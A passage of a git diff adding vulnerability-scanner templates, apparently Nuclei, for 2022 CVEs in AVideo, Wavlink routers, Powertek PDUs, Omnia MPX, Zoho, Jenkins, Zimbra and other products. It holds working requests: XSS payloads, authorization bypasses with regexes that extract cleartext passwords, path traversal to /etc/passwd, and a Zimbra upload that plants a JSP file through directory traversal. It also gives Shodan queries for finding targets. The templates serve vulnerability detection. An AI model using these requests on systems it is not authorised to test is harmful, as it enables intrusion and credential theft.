+  author: arafatansari
+  severity: medium
+  description: |
+    A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 via "success" parameter which is inserted into the document with insufficient sanitization.
+  reference:
+    - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32771
+    - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-32771
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"AVideo"
+    verified: "true"
+  tags: cve,cve2022,avideo,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'avideoAlertSuccess("</script><script>alert(document.cookie);</script>'
+          - 'text: "</script><script>alert(document.cookie);</script>'
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-32772.yaml b/cves/2022/CVE-2022-32772.yaml
new file mode 100644
index 0000000000..3092cbfd6c
--- /dev/null
+++ b/cves/2022/CVE-2022-32772.yaml
@@ -0,0 +1,42 @@
+id: CVE-2022-32772
+
+info:
+  name: WWBN AVideo 11.6 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 via "msg" parameter which is inserted into the document with insufficient sanitization.
+  reference:
+    - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32772
+    - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-32772
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"AVideo"
+    verified: "true"
+  tags: cve,cve2022,avideo,xss,wwbn
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'avideoAlertInfo("</script><script>alert(document.cookie);</script>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-33119.yaml b/cves/2022/CVE-2022-33119.yaml
new file mode 100644
index 0000000000..888c56a567
--- /dev/null
+++ b/cves/2022/CVE-2022-33119.yaml
@@ -0,0 +1,38 @@
+id: CVE-2022-33119
+
+info:
+  name: NVRsolo v03.06.02 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    NUUO Network Video Recorder NVRsolo v03.06.02 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via login.php.
+  reference:
+    - https://github.com/badboycxcc/nuuo-xss/blob/main/README.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-33119
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-33119
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"NVRsolo"
+    verified: "true"
+  tags: cve,cve2022,nvrsolo,xss
+
+requests:
+  - raw:
+      - |
+        POST /login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Referer: "><script>alert(document.domain)</script><"
+
+        language=en&user=user&pass=pass&submit=Login
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(all_headers, "text/html")'
+          - 'status_code == 200'
+          - contains(body,'<script>alert(document.domain)</script><\"?cmd=')
+        condition: and
diff --git a/cves/2022/CVE-2022-33174.yaml b/cves/2022/CVE-2022-33174.yaml
new file mode 100644
index 0000000000..59e665b041
--- /dev/null
+++ b/cves/2022/CVE-2022-33174.yaml
@@ -0,0 +1,49 @@
+id: CVE-2022-33174
+
+info:
+  name: Powertek Firmware <3.30.30 - Authorization Bypass
+  author: pikpikcu
+  severity: high
+  description: |
+    Powertek firmware (multiple brands) before 3.30.30 running Power Distribution Units are vulnerable to authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext.
+  reference:
+    - https://gynvael.coldwind.pl/?lang=en&id=748
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-33174
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-33174
+    cwe-id: CWE-863
+  metadata:
+    shodan-query: http.html:"Powertek"
+    verified: "true"
+  tags: cve,cve2022,powertek,auth-bypass
+
+requests:
+  - raw:
+      - |
+        GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: tmpToken=;
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - '<sys.passwd>'
+          - '<sys.su.name>'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '<sys\.passwd>([A-Z0-9a-z]+)<\/sys\.passwd>'
+          - '<sys\.su\.name>([a-z]+)<\/sys\.su\.name>'
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2022/CVE-2022-34045.yaml b/cves/2022/CVE-2022-34045.yaml
new file mode 100644
index 0000000000..2e1dbb6b31
--- /dev/null
+++ b/cves/2022/CVE-2022-34045.yaml
@@ -0,0 +1,42 @@
+id: CVE-2022-34045
+
+info:
+  name: Wavlink WN530HG4 - Access Control
+  author: arafatansari
+  severity: critical
+  description: |
+    Wavlink WN530HG4 M30HG4.V5030.191116 was discovered to contain a hardcoded encryption/decryption key for its configuration files at /etc_ro/lighttpd/www/cgi-bin/ExportAllSettings.sh.
+  reference:
+    - https://drive.google.com/file/d/1s5uZGC_iSzfCJt9BJ8h-P24vmsrmttrf/view?usp=sharing
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-34045
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-34045
+    cwe-id: CWE-798
+  metadata:
+    shodan-query: http.html:"WN530HG4"
+    verified: "true"
+  tags: cve,cve2022,wavlink,exposure
+
+requests:
+  - raw:
+      - |
+        GET /backupsettings.dat HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Salted__'
+
+      - type: word
+        part: header
+        words:
+          - application/octet-stream
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-34046.yaml b/cves/2022/CVE-2022-34046.yaml
new file mode 100644
index 0000000000..d6e06bf5cd
--- /dev/null
+++ b/cves/2022/CVE-2022-34046.yaml
@@ -0,0 +1,45 @@
+id: CVE-2022-34046
+
+info:
+  name: Wavlink Sysinit.shtml - Password Exposure
+  author: For3stCo1d
+  severity: high
+  description: |
+    An access control issue in Wavlink WN533A8 M33A8.V5030.190716 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);].
+  reference:
+    - https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046
+    - http://packetstormsecurity.com/files/167890/Wavlink-WN533A8-Password-Disclosure.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-34046
+    cwe-id: CWE-863
+  metadata:
+    shodan-query: http.title:"Wi-Fi APP Login"
+    verified: "true"
+  tags: packetstorm,cve,cve2022,wavlink,router,exposure
+
+requests:
+  - raw:
+      - |
+        GET /sysinit.shtml?r=52300 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'var syspasswd="'
+          - '<title>APP</title>'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        regex:
+          - 'syspasswd="(.+?)"'
diff --git a/cves/2022/CVE-2022-34047.yaml b/cves/2022/CVE-2022-34047.yaml
new file mode 100644
index 0000000000..50283475b9
--- /dev/null
+++ b/cves/2022/CVE-2022-34047.yaml
@@ -0,0 +1,45 @@
+id: CVE-2022-34047
+
+info:
+  name: Wavlink Set_safety.shtml - Password Exposure
+  author: For3stCo1d
+  severity: high
+  description: |
+    An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd].
+  reference:
+    - https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047
+    - http://packetstormsecurity.com/files/167891/Wavlink-WN530HG4-Password-Disclosure.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-34047
+    cwe-id: CWE-668
+  metadata:
+    shodan-query: http.title:"Wi-Fi APP Login"
+    verified: "true"
+  tags: cve2022,wavlink,router,exposure,packetstorm,cve
+
+requests:
+  - raw:
+      - |
+        GET /set_safety.shtml?r=52300 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'var syspasswd="'
+          - '<title>APP</title>'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        regex:
+          - 'syspasswd="(.+?)"'
diff --git a/cves/2022/CVE-2022-34048.yaml b/cves/2022/CVE-2022-34048.yaml
new file mode 100644
index 0000000000..8ede023429
--- /dev/null
+++ b/cves/2022/CVE-2022-34048.yaml
@@ -0,0 +1,46 @@
+id: CVE-2022-34048
+
+info:
+  name: Wavlink WN533A8 - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    Wavlink WN533A8 M33A8.V5030.190716 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the login_page parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/50989
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-34048
+    - https://drive.google.com/file/d/1xznFhH3w3TDN2RCdX62_ebylR4yaKmzf/view?usp=sharing
+    - https://drive.google.com/file/d/1NI3-k3AGIsSe2zjeigl1GVyU1VpG1SV3/view?usp=sharing
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-34048
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"Wavlink"
+    verified: "true"
+  tags: cve2022,wavlink,xss,router,edb,cve
+
+requests:
+  - raw:
+      - |
+        POST /cgi-bin/login.cgi HTTP/1.1
+        Host: {{Hostname}}
+
+        newUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x");alert(9);x=("&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'x");alert(9);x=("?login=0");</script>'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-34049.yaml b/cves/2022/CVE-2022-34049.yaml
new file mode 100644
index 0000000000..8348fca99e
--- /dev/null
+++ b/cves/2022/CVE-2022-34049.yaml
@@ -0,0 +1,46 @@
+id: CVE-2022-34049
+
+info:
+  name: Wavlink Exportlogs.sh - Configuration Exposure
+  author: For3stCo1d
+  severity: medium
+  description: |
+    An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows unauthenticated attackers to download log files and configuration data.
+  reference:
+    - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34049
+    - https://drive.google.com/file/d/1ZeSwqu04OghLQXeG7emU-w-Amgadafqx/view?usp=sharing
+    - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view?usp=sharing
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2022-34049
+    cwe-id: CWE-552
+  metadata:
+    shodan-query: http.title:"Wi-Fi APP Login"
+    verified: "true"
+  tags: cve,cve2022,wavlink,router,exposure
+
+requests:
+  - raw:
+      - |
+        GET /cgi-bin/ExportLogs.sh HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Login'
+          - 'Password'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - filename="sysLogs.txt"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-34328.yaml b/cves/2022/CVE-2022-34328.yaml
new file mode 100644
index 0000000000..0a03575c31
--- /dev/null
+++ b/cves/2022/CVE-2022-34328.yaml
@@ -0,0 +1,42 @@
+id: CVE-2022-34328
+
+info:
+  name: PMB 7.3.10 - Cross-Site Scripting
+  author: edoardottt
+  severity: medium
+  description: |
+    PMB 7.3.10 allows reflected XSS via the id parameter in an lvl=author_see request to index.php.
+  reference:
+    - https://github.com/jenaye/PMB/blob/main/README.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-34328
+    - https://github.com/jenaye/PMB
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-34328
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"PMB Group"
+    verified: "true"
+  tags: cve,cve2022,pmb,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<script>alert(document.domain)</script>' target='cart_info"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-34576.yaml b/cves/2022/CVE-2022-34576.yaml
new file mode 100644
index 0000000000..7f593412ad
--- /dev/null
+++ b/cves/2022/CVE-2022-34576.yaml
@@ -0,0 +1,38 @@
+id: CVE-2022-34576
+
+info:
+  name: WAVLINK WN535 G3 - Access Control
+  author: arafatansari
+  severity: high
+  description: |
+    A vulnerability in /cgi-bin/ExportAllSettings.sh of WAVLINK WN535 G3 M35G3R.V5030.180927 allows attackers to execute arbitrary code via a crafted POST request.
+  reference:
+    - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3_Sensitive%20information%20leakage.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-34576
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-34576
+  metadata:
+    shodan-query: http.html:"Wavlink"
+    verified: "true"
+  tags: cve,cve2022,wavlink,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Login='
+          - 'Password='
+          - 'Model='
+          - 'AuthMode='
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-35151.yaml b/cves/2022/CVE-2022-35151.yaml
new file mode 100644
index 0000000000..e1636ce4eb
--- /dev/null
+++ b/cves/2022/CVE-2022-35151.yaml
@@ -0,0 +1,44 @@
+id: CVE-2022-35151
+
+info:
+  name: kkFileView v4.1.0 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    kkFileView v4.1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
+  reference:
+    - https://github.com/kekingcn/kkFileView/issues/366
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-35151
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-35151
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"kkFileView"
+    verified: "true"
+  tags: cve,cve2022,xss,kkfileview
+
+requests:
+  - raw:
+      - |
+        GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<svg/onload=alert(document.domain)>'
+          - '图片预览'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-35405.yaml b/cves/2022/CVE-2022-35405.yaml
new file mode 100644
index 0000000000..d6aad35007
--- /dev/null
+++ b/cves/2022/CVE-2022-35405.yaml
@@ -0,0 +1,58 @@
+id: CVE-2022-35405
+
+info:
+  name: Zoho ManageEngine Password Manager Pro - Unauthenticated Remote Command Execution
+  author: true13
+  severity: critical
+  description: |
+    This is a de-serialization vulnerability that causes unauthenticated RCE in XML-RPC of Zoho Manage Engine Password Manager Pro.
+  reference:
+    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb
+    - https://xz.aliyun.com/t/11578
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-35405
+    - https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-35405
+  metadata:
+    shodan-query: http.title:"ManageEngine Password"
+  tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf
+
+requests:
+  - raw:
+      - |
+        POST /xmlrpc HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+        <?xml version="1.0"?>
+        <methodCall>
+          <methodName>ProjectDiscovery</methodName>
+          <params>
+            <param>
+              <value>
+                <struct>
+                  <member>
+                    <name>test</name>
+                    <value>
+                      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable>
+                    </value>
+                  </member>
+                </struct>
+              </value>
+            </param>
+          </params>
+        </methodCall>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Failed to read result object: null"
+
+      - type: word
+        part: header
+        words:
+          - text/xml
diff --git a/cves/2022/CVE-2022-35416.yaml b/cves/2022/CVE-2022-35416.yaml
new file mode 100644
index 0000000000..e7524e8a37
--- /dev/null
+++ b/cves/2022/CVE-2022-35416.yaml
@@ -0,0 +1,44 @@
+id: CVE-2022-35416
+
+info:
+  name: H3C SSL VPN through 2022-07-10 - Cookie Based Cross-Site Scripting
+  author: 0x240x23elu
+  severity: medium
+  description: |
+    H3C SSL VPN through 2022-07-10 allows wnm/login/login.json svpnlang cookie XSS.
+  reference:
+    - https://github.com/advisories/GHSA-9x76-78gc-r3m9
+    - https://github.com/Docker-droid/H3C_SSL_VPN_XSS
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-35416
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-35416
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html_hash:510586239
+    verified: "true"
+  tags: cve,cve2022,xss,vpn,h3c
+
+requests:
+  - raw:
+      - |
+        GET /wnm/login/login.json HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: svpnlang=<script>alert('document.domain')</script>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<script>alert('document.domain')</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-35493.yaml b/cves/2022/CVE-2022-35493.yaml
new file mode 100644
index 0000000000..c4c73faba3
--- /dev/null
+++ b/cves/2022/CVE-2022-35493.yaml
@@ -0,0 +1,40 @@
+id: CVE-2022-35493
+
+info:
+  name: eShop - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    eShop - Multipurpose Ecommerce Store Website v3.0.4 allows Reflected Cross-site scripting vulnerability in json search parse and the json response in wrteam.in.
+  reference:
+    - https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS/blob/main/README.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-35493
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-35493
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"eShop - Multipurpose Ecommerce"
+    verified: "true"
+  tags: cve,cve2022,eshop,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Search Result for \"><img src=x onerror=alert(document.domain)>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-36642.yaml b/cves/2022/CVE-2022-36642.yaml
new file mode 100644
index 0000000000..d36b250033
--- /dev/null
+++ b/cves/2022/CVE-2022-36642.yaml
@@ -0,0 +1,43 @@
+id: CVE-2022-36642
+
+info:
+  name: Omnia MPX 1.5.0+r1 - Path Traversal
+  author: arafatansari,ritikchaddha,For3stCo1d
+  severity: critical
+  description: |
+    A local file disclosure vulnerability in /appConfig/userDB.json of Telos Alliance Omnia MPX Node through 1.5.0+r1 allows attackers to escalate privileges to root and execute arbitrary commands.
+  reference:
+    - https://www.exploit-db.com/exploits/50996
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36642
+    - https://cyber-guy.gitbook.io/cyber-guy/pocs/omnia-node-mpx-auth-bypass-via-lfd
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-36642
+    cwe-id: CWE-862
+  metadata:
+    shodan-query: http.title:"Omnia MPX Node | Login"
+    verified: "true"
+  tags: traversal,omnia,edb,cve,cve2022,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
+      - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: word
+        part: body
+        words:
+          - '"username":'
+          - '"password":'
+          - '"mustChangePwd":'
+          - '"roleUser":'
+        condition: and
diff --git a/cves/2022/CVE-2022-36883.yaml b/cves/2022/CVE-2022-36883.yaml
new file mode 100644
index 0000000000..56ea8fccfa
--- /dev/null
+++ b/cves/2022/CVE-2022-36883.yaml
@@ -0,0 +1,38 @@
+id: CVE-2022-36883
+
+info:
+  name: Git Plugin up to 4.11.3 on Jenkins Build Authorization
+  author: c-sh0
+  severity: high
+  description: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit.
+  reference:
+    - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-36883
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-36883
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-36883
+    cwe-id: CWE-862
+  metadata:
+    shodan-query: X-Jenkins
+    verified: "true"
+  tags: cve,cve2022,jenkins,plugin,git
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "repository:"
+          - "SCM API plugin"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-37042.yaml b/cves/2022/CVE-2022-37042.yaml
new file mode 100644
index 0000000000..3f68ce5c7f
--- /dev/null
+++ b/cves/2022/CVE-2022-37042.yaml
@@ -0,0 +1,51 @@
+id: CVE-2022-37042
+
+info:
+  name: Zimbra Collaboration Suite - Unauthenticated RCE
+  author: _0xf4n9x_,For3stCo1d
+  severity: critical
+  description: |
+    Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. This issue exists because of an incomplete fix for CVE-2022-27925.
+  reference:
+    - https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-37042
+    - https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/
+    - https://github.com/vnhacker1337/CVE-2022-27925-PoC
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-37042
+    cwe-id: CWE-287
+  metadata:
+    fofa-query: app="zimbra-邮件系统"
+    shodan-query: http.favicon.hash:"1624375939"
+  tags: cve,cve2022,zimbra,rce,unauth,kev
+
+requests:
+  - raw:
+      - |
+        POST {{path}} HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip, deflate
+        content-type: application/x-www-form-urlencoded
+
+        {{hex_decode("504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000000000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000f00000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b05060000000002000200d6000000e00100000000")}}
+
+      - |
+        GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1
+        Host: {{Hostname}}
+
+    payloads:
+      path:
+        - /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1
+        - /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd
+
+    stop-at-first-match: true
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 401'
+          - 'status_code_2 == 200'
+          - "contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')"
+        condition: and
\ No newline at end of file
diff --git a/cves/2022/CVE-2022-37153.yaml b/cves/2022/CVE-2022-37153.yaml
new file mode 100644
index 0000000000..7bde99b1eb
--- /dev/null
